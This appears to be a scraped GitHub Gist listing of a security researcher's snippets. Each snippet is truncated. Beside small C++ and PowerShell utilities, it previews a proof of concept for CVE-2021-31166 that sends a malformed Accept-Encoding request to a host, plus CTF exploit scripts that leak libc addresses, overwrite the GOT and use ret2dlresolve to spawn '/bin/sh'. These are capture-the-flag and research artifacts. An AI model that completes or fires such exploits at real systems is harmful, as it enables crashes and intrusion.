hugsy
/ constexpr_rand.cc
Created Jul 21, 2022
Basic (bad) experiments for a constexpr rand() function
View constexpr_rand.cc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Requires C++20 | |
| // | |
| #include <cstdint> | |
| #include <iostream> | |
| #include <string> | |
| constexpr static auto to_int(const char* str, int offset) { | |
| return static_cast<std::uint32_t>(str[offset] - '0') * 10 + |
View streams1.cpp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // http://web.archive.org/web/20150617011338/http://win32.mvps.org/ntfs/dump_ntfs_streams.cpp | |
| // | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #pragma hdrstop | |
View Microsoft.PowerShell_profile.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module posh-git | |
| Import-Module oh-my-posh | |
| Import-Module -Name Terminal-Icons | |
| Set-PoshPrompt slimfat | |
| Set-PSReadlineOption -EditMode Emacs | |
| Set-PSReadLineKeyHandler -Chord Ctrl+LeftArrow -Function BackwardWord | |
| Set-PSReadLineKeyHandler -Chord Ctrl+RightArrow -Function NextWord | |
| # Set-PSReadLineKeyHandler -Chord Ctrl+Backspace -Function BackwardKillWord |
hugsy
/ cve-2021-31166.py
Last active Jun 5, 2021
View cve-2021-31166.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3.9 | |
| import socket | |
| s = socket.socket() | |
| s.connect( ("192.168.57.99", 80) ) | |
| s.send(b"""POST / HTTP/1.1\r | |
| Host: 192.168.57.99\r | |
| Accept-Encoding: w00t\r | |
| Accept-Encoding: \r |
View xp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| """ | |
| death_note - securinets quals 2021 | |
| @_hugsy_ | |
| $ checksec ./death_note | |
| Arch: amd64-64-little | |
| RELRO: Full RELRO | |
| Stack: Canary found |
View xp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.9 | |
| """ | |
| membership - securinets quals 2021 | |
| @_hugsy_ | |
| $ ./xp.py remote | |
| [*] '/home/hugsy/ctf/securinets_quals_2021/membership/membership' | |
| Arch: amd64-64-little | |
| RELRO: Full RELRO |
View xp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| """ | |
| $ ./xp.py remote | |
| [+] Opening connection to bin.q21.ctfsecurinets.com on port 1338: Done | |
| [*] step 1: leak stuff | |
| [+] leaked addresses: | |
| 0x563765daa240 | |
| 0x563765da9b10 | |
| 0x7ffd0d86b5e0 |
View xp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.9 | |
| # | |
| # This exploits `ret2dlresolve` technique: the idea behind this attack is | |
| # to forge fake structures to force the LD runtime resolver to resolve and | |
| # execute `system('/bin/sh')`. | |
| # | |
| # To do that, we forge 2 objects, the Rela (holding the symbol offset) and | |
| # the Sym (holding the symbol information). | |
| # | |
| # Note: if using this attack, offsets must be calculated precisely and remember |
View xp.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| """ | |
| [*] getting control of banana[1] via banana[3]... | |
| [*] leaking atoi in libc... | |
| [+] leaking atoi(): 7f42bbdfa7a0 | |
| [+] libc base: 7f42bbdba000 | |
| [+] system: 7f42bbe09550 | |
| [*] overwrite atoi@got with system... | |
| [*] trigger system() |
View babyrop.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| import os, sys | |
| from pwn import * | |
| context.update(arch="amd64", endian="little", os="linux", | |
| terminal=["tmux", "split-window", "-v", "-p 75"],) | |
| LOCAL = True | |
| TARGET_ELF = os.path.realpath("./babyrop") |
NewerOlder